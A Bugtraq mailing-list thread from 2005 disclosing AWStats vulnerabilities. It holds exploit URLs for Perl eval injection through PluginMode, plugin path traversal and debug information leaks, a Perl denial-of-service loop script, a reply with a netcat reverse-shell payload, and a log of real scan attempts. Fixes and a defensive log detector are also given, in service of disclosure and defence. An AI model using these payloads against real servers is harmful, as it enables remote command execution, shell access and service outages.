Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
Date: 14 Feb 2005 08:10:40 -0000
From: [EMAIL PROTECTED],
[EMAIL PROTECTED]@www.securityfocus.com <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: AWStats <= 6.4 Multiple vulnerabilities
/*==========================================*/
// GHC -> AWStats <- ADVISORY
\\ PRODUCT: AWStats
// VERSION: <= 6.3
\\ URL: http://awstats.sourceforge.net/
// VULNERABILITY CLASS: Multiple vulnerabilities
\\ RISK: high
/*==========================================*/
[Product Description]
"AWStats is a free powerful tool that generates advanced web, ftp or
mail server statistics, graphically.
This log analyzer works as a CGI or from command line and shows you
all possible information your log contains,
in few graphical web pages".
Current stable version: AWStats 6.3 final
Development version is 6.4 - 2005-02-06 14:31
[Summary]
Successful exploitation of an input validation vulnerability in AWStats scripts
allows attackers to execute limited Perl directives under the privileges of
the web server and to obtain sensitive information.
Some actions of the attacker can lead to denial of service.
[Details]
Some of AWStats's functions can be extended with plugins.
Two variables (loadplugin & pluginmode) deal with this.
The first one (loadplugin) is responsible for the plugin list (plugin1,
plugin2); the second one runs a plugin's functions.
Exploitable example (raw log plugin):
http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
Server answer:
192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 500 606
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/style.css HTTP/1.1" 200 2986
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 200 7710
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/logo.gif HTTP/1.1" 200 14443
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif HTTP/1.1" 200 429
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif HTTP/1.1" 200 2532
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /themes/standard/images/vcss.gif HTTP/1.1" 200 1547
192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi HTTP/1.1" 200 7333
192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi HTTP/1.1" 200 7588
192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi HTTP/1.1" 200 7910
192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 7340
192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml HTTP/1.1" 200 153
The dangerous fact is that an attacker can read sensitive information such as
IP addresses, admin script names, unencoded GET queries, etc.
Our variables pass some verification (as the others do), but it is not
enough for security:
sub Sanitize {
    my $stringtoclean=shift;
    $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
    return $stringtoclean;
}
This deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
It's enough for variables holding the path to configuration files, but not
for plugin tasks.
In the case of "loadplugin" & "pluginmode" the developers obviously have a
lot of trust in the user.
So, let's see what can be done, in fact.
[1] Perl code execution.
http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
We'll get the action in the next piece of code:
# AWStats output is replaced by a plugin output
if ($PluginMode) {
    my $function="BuildFullHTMLOutput_$PluginMode()";
    eval("$function");
    if ($? || $@) { error("$@"); }
    &html_end(0);
    exit 0;
}
If the variable exists, we'll get code execution. This happens after
sanitizing (see previous).
Here we have the interesting part in:
my $function="BuildFullHTMLOutput_$PluginMode()";
eval("$function");
This is a subroutine call (as an example, sub BuildFullHTMLOutput_rawlog() from
the rawlog.pm plugin).
Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
But if we don't specify the name of the module (with the "loadplugin"
parameter) we'll get the next:
main::BuildFullHTMLOutput_"function name"().
By the way, the symbol ':' is permitted in user input parameters.
So, we can send:
PluginMode=:print+getpwent
And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
This will satisfy eval() requirements, and :print getpwent() is executed.
http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
Sanitizing limits the user's input, but there is no filtration for the call
symbols '()'.
Here we can see that somebody can perform a DoS attack.
This is an example of simple code for successful DoS exploitation:
#!/usr/bin/perl
use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
        || die "Error\n";
    print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "\n\n";
}
while () {
    $rp = rand;
    &ConnectServer;
}
[BUGFIX]
Change the vulnerable code to:
sub PluginSanitize {
    my $stringtoclean=shift;
    $stringtoclean =~ s/[^\w]//g;
    return $stringtoclean;
}
[2] Arbitrary plugin including.
http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
An arbitrary module from the user's input through the "loadplugin" parameter
can be included with the "require" function.
Bugfix - as above, or something like this:
opendir (PDIR, './plugins');
@FilesPDIR = readdir(PDIR);
closedir (PDIR);
foreach $FilesPName (@FilesPDIR) {
    if ($FilesPName =~ m/$loadplugin/) {
        # accept $loadplugin only when it names an installed plugin file
    }
}
The good thing is that the poison null byte (%00) has no place (it becomes 00).
[3] Sensitive information leak in AWStats version 6.3 (stable) -
6.4 (development).
Every user can access the debug function:
http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
[DISCLOSURE TIMELINE]
10-02-2005 Initial vendor notification.
14-02-2005 No response.
14-02-2005 Bug-traq post.
/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
/* Special respect to e-defense. */
/* ================================================== */
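The sanitizer comparison from the advisory above, as an added example in Python rather than the project's own Perl (it is not part of the original post): sanitize_original() and sanitize_plugin() translate the two regexes, eval_string() builds the same string AWStats hands to eval(), query_param() shows the '+' to space decoding, and plugin_mode_allowed() is an assumed allowlist check against installed plugin names, not AWStats code.

```python
import re
from urllib.parse import parse_qsl

# Python translation of the advisory's Sanitize() character class: everything
# except word characters, '_', '-', '\', '/', '.', ':' and whitespace is removed.
SANITIZE_ORIGINAL = re.compile(r"[^\w_\-\\/.:\s]")
# The advisory's proposed PluginSanitize(): word characters only.
SANITIZE_PLUGIN = re.compile(r"[^\w]")

def sanitize_original(value: str) -> str:
    return SANITIZE_ORIGINAL.sub("", value)

def sanitize_plugin(value: str) -> str:
    return SANITIZE_PLUGIN.sub("", value)

def query_param(query: str, name: str) -> str:
    """Fetch a query parameter case-insensitively; '+' decodes to a space here."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() == name.lower():
            return value
    return ""

def eval_string(plugin_mode: str) -> str:
    """The string AWStats builds before eval(): BuildFullHTMLOutput_$PluginMode()."""
    return f"BuildFullHTMLOutput_{plugin_mode}()"

def plugin_mode_allowed(plugin_mode: str, installed_plugins) -> bool:
    """Assumed defence (not AWStats code): exact match against installed plugin names."""
    return plugin_mode in set(installed_plugins)

def demo() -> dict:
    # The advisory's request: the colon and the space survive the original regex,
    # so the eval string is no longer a plain subroutine name.
    mode = query_param("&PluginMode=:print+getpwent", "pluginmode")
    return {
        "original": eval_string(sanitize_original(mode)),
        "plugin": eval_string(sanitize_plugin(mode)),
        "allowed": plugin_mode_allowed(sanitize_plugin(mode), ["rawlog", "hostinfo"]),
    }
```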
At 16:24 +0100 15/2/2005, Ondra Holecek wrote:
|
| PluginMode=:print+getpwent
|
| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
| This will satisfy eval() requirements, and :print getpwent() is executed.
|
| http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
|
| Sanitizing limits the user's input, but there is no filtration for the
| call symbols '()'.
No, the user is not limited; he can execute ANY command if he adds ; at the
end of the command. Try this:
awstats.pl?&PluginMode=:print+system('id')+;
or even this:
awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
At 14:25 -0500 15/2/2005, Jamie Pratt wrote:
So what are the conditions of this bug/vuln? I can't reproduce
this on several 6.3 installs:
awstats 6.3 from source:
request:
http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+;
output:
****************
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
***************
At 20:52 +0100 15/2/2005, Ondra Holecek wrote:
It seems this bug works only on my server, I don't know why.
/awstats.pl?&PluginMode=:print+system('id')+;
reply:
uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
Error:
Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
perl: This is perl, v5.8.5 built for i586-linux
os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown unknown GNU/Linux
At 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:
It works on mine too, though I still have 6.1. I think you may
need to add the config=www.example.com into the url between the '?'
and the '&' for it to work properly though. On my linux boxes with
apache 2.0 it displays the command output in the page but on
openbsd with apache 1.3 it gives a 500 Server Error because the
output ends up in the headers somehow. Either way it works though.
At 22:23 +0100 15/2/2005, Ondra Holecek wrote:
I'm sorry I didn't write it: only awstats 6.1 and 6.2 are vulnerable to this
bug (system('id'), etc.).
At 12:53 -0800 15/2/2005, William Pratt wrote:
Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1.
Setup ('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
William Pratt
Sr. Engineering Application Developer
Megapath Networks, Inc.
Http://www.MegaPath.net
I wish there was a knob on the TV to turn up the intelligence.
There's a knob called "brightness", but it doesn't seem to work.
At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:
Nonetheless, each of these causes AWstats to disclose the full path to the
AWstats installation, regardless if *nix or Windows. That alone is enough
for concern.
At 14:00 -0700 15/2/2005, [EMAIL PROTECTED] wrote:
You may need to specify an awstats config to view it.
Example:
http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&PluginMode=:print+system('id')+;
At 16:46 -0500 15/2/2005, Jamie Pratt wrote:
Still no dice on 6.3, even with the "config=www.site.org" etc., etc.;
same error. So, can we all agree that 6.3 is not vulnerable,
because I'd rather not upgrade to a dev/unstable release for no
reason...
At 9:47 -0500 16/2/2005, Thom Craver wrote:
I can confirm the bug on 6.3 running Apache 2.0.52.
Furthermore, ANY system command inserted in the system() call can
be executed. This is a very serious bug. Unprivileged user or
not, with an .rhosts file on a potential attacker's end, scp would
work just nicely, then a chmod, then execution of any script they
wanted to upload.
This issue is not to be taken lightly.
Until this issue is resolved, we have commented out the Plugin lines:
# AWStats output is replaced by a plugin output
if ($PluginMode) {
    my $function="BuildFullHTMLOutput_$PluginMode()";
    eval("$function");
    if ($? || $@) { error("$@"); }
    &html_end(0);
    exit 0;
}
If a plugin is called, it is apparently ignored and the stats are displayed.
--
Thom Craver
Corporate Communications, Inc.
www.corp-com.com
At 7:45 +0000 16/2/2005, K-OTiK Security wrote:
6.4 was released on 2005-02-14 13:13
Fixes:
- Fix security hole that allowed a user to read log file content even
when plugin rawlog was not enabled.
- Fix a possible use of AWStats for a DoS attack.
- configdir option was broken on windows servers.
- Minor fixes
Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com/english
At 15:52 -0500 16/2/2005, Micah Brandon wrote:
I'm going to have to disagree. Execution of Perl functions
is still possible in 6.3. You just have to jimmy it a little and
try/guess different plugins that may be installed. I got a hit
with 'hostinfo'. Try this on your server:
http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
Unix time shows up just below 'Whois command failed' error message.
That's game over in my book.
At 20:34 -0500 16/2/2005, Michael Scheidell wrote:
And the skiddies who tried to exploit something that didn't exist on our
site:
(this goes on for some time, here is just a snip)
So, anyone out there who decided to do a 'wait and see', don't.
Disable awstats, use access rules, upgrade it or all three.
217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //awstatswwwroot/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/cgi-bin/awstats.pl
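An added detection example (not part of the thread, written in Python) that parses combined-format access log lines like the snippet above and flags awstats.pl requests whose configdir, loadplugin, PluginMode or debug parameters match the abuse patterns discussed in this thread; the sample lines and their 192.0.2.x addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# NCSA combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Parameters abused in the thread: configdir (command injection attempts in the scan
# above), loadplugin (arbitrary include), PluginMode (eval of the value), debug (info leak).
WATCHED_PARAMS = {"configdir", "loadplugin", "pluginmode", "debug"}
WORD_ONLY = re.compile(r"^\w+$")  # same allowlist as the advisory's PluginSanitize()

def classify_request(target: str) -> list:
    """Reasons a request target looks like AWStats probing; empty list when benign."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("awstats.pl"):
        return []
    reasons = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        name = key.lower()
        if name == "debug":
            reasons.append("debug output requested")
        elif name == "loadplugin":
            reasons.append(f"plugin loaded from query string: {value!r}")
        elif name in WATCHED_PARAMS and not WORD_ONLY.match(value):
            reasons.append(f"{name} contains non-word characters: {value!r}")
    return reasons

def scan_log(lines):
    """Return (client ip, status, reasons) for every line that trips a rule."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match:
            reasons = classify_request(match["target"])
            if reasons:
                hits.append((match["ip"], match["status"], reasons))
    return hits

# Constructed sample lines (documentation-range addresses), modelled on the scan above.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2005:12:28:28 -0500] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [15/Feb/2005:09:01:02 -0500] "GET /cgi-bin/awstats.pl?config=site&PluginMode=:print+getpwent HTTP/1.1" 200 1204 "-" "curl"',
    '192.0.2.12 - - [15/Feb/2005:09:02:00 -0500] "GET /cgi-bin/awstats.pl?config=site&pluginmode=rawlog&loadplugin=rawlog HTTP/1.1" 200 7710 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [15/Feb/2005:09:03:00 -0500] "GET /cgi-bin/awstats.pl?config=site&pluginmode=hostinfo HTTP/1.1" 200 6000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, reasons in scan_log(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```

The fourth sample line (a plain pluginmode=hostinfo request) is deliberately left unflagged, since a word-only plugin name is what the UI itself generates.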
At 14:01 -0500 17/2/2005, Matt Wilder wrote:
Awstats version 5.6 is not susceptible to this as it does not have the
same plugin architecture. Could this be a >= 6.0 bug?
At 14:46 +0000 18/2/2005, newbug Tseng wrote:
Hi.
Please check
http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
There is some code analysis for awstats there.
At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:
>Subject: AWStats <= 6.4 Multiple vulnerabilities
Must read AWStats <= 6.3. Version 6.4 is not affected.